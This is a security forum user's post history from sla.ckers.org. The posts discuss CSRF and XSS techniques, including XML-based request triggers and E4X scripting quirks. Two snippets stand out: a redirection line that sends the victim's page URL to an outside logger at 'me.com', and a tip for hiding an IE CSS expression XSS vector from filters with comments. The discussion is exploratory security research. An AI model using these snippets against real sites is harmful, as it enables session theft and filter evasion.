Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Current Page: 1 of 1
Results 1 - 21 of 21
5 years ago
riahmatic
Okay, I have something. The clientside code would still have access to local intranet resources, where as the server side code wouldn't - so the reach actually isn't the same. Even though they are both stateless the clientside code can load anything off the intranet unless it's locked down. Any unsecured files and forms could be requested. So not sending cookies doesn't seem to be enough protectio
Forum: CSRF and Session Info
6 years ago
riahmatic
Let's say browsers didn't send any cookies when embedding content (img, script, css, video) across domains and allowed cross-domain requests on anything. so your client-side code would have the same reach as server-side code and the same restrictions, having no session cookies. What are the flaws with this model - any new risks? I couldn't come up with anything good.
Forum: CSRF and Session Info
6 years ago
riahmatic
yeah, this is getting interesting
Forum: XSS Info
6 years ago
riahmatic
double post, my b
Forum: XSS Info
6 years ago
riahmatic
wow, 1..* is valid syntax.
Forum: XSS Info
6 years ago
riahmatic
rdf:resource attributes, GET, returns data edit: It's safe to say that most clients who read arbitrary XML attributes that utilize URLs could be susceptible to CSRFs. A friend's VoiP setup that uses an XML config file to grab images comes to mind.
Forum: CSRF and Session Info
6 years ago
riahmatic
i tried everything i could think of overloading XML and XMLList, getters, setters, got nothing :(. good resource: http://rephrase.net/days/07/06/e4x
Forum: XSS Info
6 years ago
riahmatic
i don't see the save button for the chat anymore :( edit: err nevermind. edit: you could check parent.location and maybe modify the form randomly if it doens't match yours. or just break out.
Forum: CSRF and Session Info
6 years ago
riahmatic
@Ronald That would be a neat way to check if someone has an extension installed, check for an entity from it's DTD
Forum: CSRF and Session Info
6 years ago
riahmatic
don't forget xml schemas xsi:schemaLocation="http://www.w3schools.com/note.xsd" GET, returns xml data
Forum: CSRF and Session Info
6 years ago
riahmatic
window.onunload will fire if the page reloads or the window closes. could do something like: for all in-site links/forms, onsubmit/onclick="window.localLoad=true" then this would catch everything else (close, remote link, crash?), window.onunload = function(){if(!localLoad)/*logout logic here*/;}
Forum: CSRF and Session Info
6 years ago
riahmatic
probably a stretch but, some clients will fetch DTD urls.. GET
Forum: CSRF and Session Info
6 years ago
riahmatic
checking out what scope {} executes in function blah(){ e4x = <a>{alert(this)}</a> } // alerts blah(); // alerts var b = new blah(); (in the later case, the object it alerts is b, not the e4x var it self)
Forum: XSS Info
6 years ago
riahmatic
a = alert e4x = <a>{a(1)}</a> sadly, no opera or safari support either :(
Forum: XSS Info
6 years ago
riahmatic
Have the redirection script append the current page's location as a parameter to the logger, something like: document.location = 'http://me.com/logger.php?good_url='+document.location.href Then you can grap that param in your php (This assumes the redirection happens from the profile page)
Forum: XSS Info
6 years ago
riahmatic
The image contents don't become a part of the html source, so no, don't think that'll work.
Forum: XSS Info
6 years ago
riahmatic
mm check out revision 107 of their wiki: http://developer.yahoo.net/hackday-wiki/index.cgi?action=revisions&page_name=HomePage&revision_id=107 brokenz
Forum: Full Disclosure
6 years ago
riahmatic
I think a file sharing client written in javascript would be cool :D
Forum: XSS Info
6 years ago
riahmatic
I've compleeted it, but I'm very interested in the hack you found, .mario.
Forum: XSS Info
6 years ago
riahmatic
@noconnexion I think the backslashes in e\xp\re\s\s\i\o\n are breaking the vector in IE. Instead of backslashes you could use comments in it like: expres/**/sion. You could place /*woohoocomment*/ between every char if you wanted and it'd still work.
Forum: XSS Info
6 years ago
riahmatic
oh hai I was drug here by that diminutive XSS worm contest. Javascript was my first prog language, but that was seriously some crazy ish I witnessed there, hah. I build web apps but didn't really pay attention to security much... now it's like crack to me :/
Forum: Intro
Current Page: 1 of 1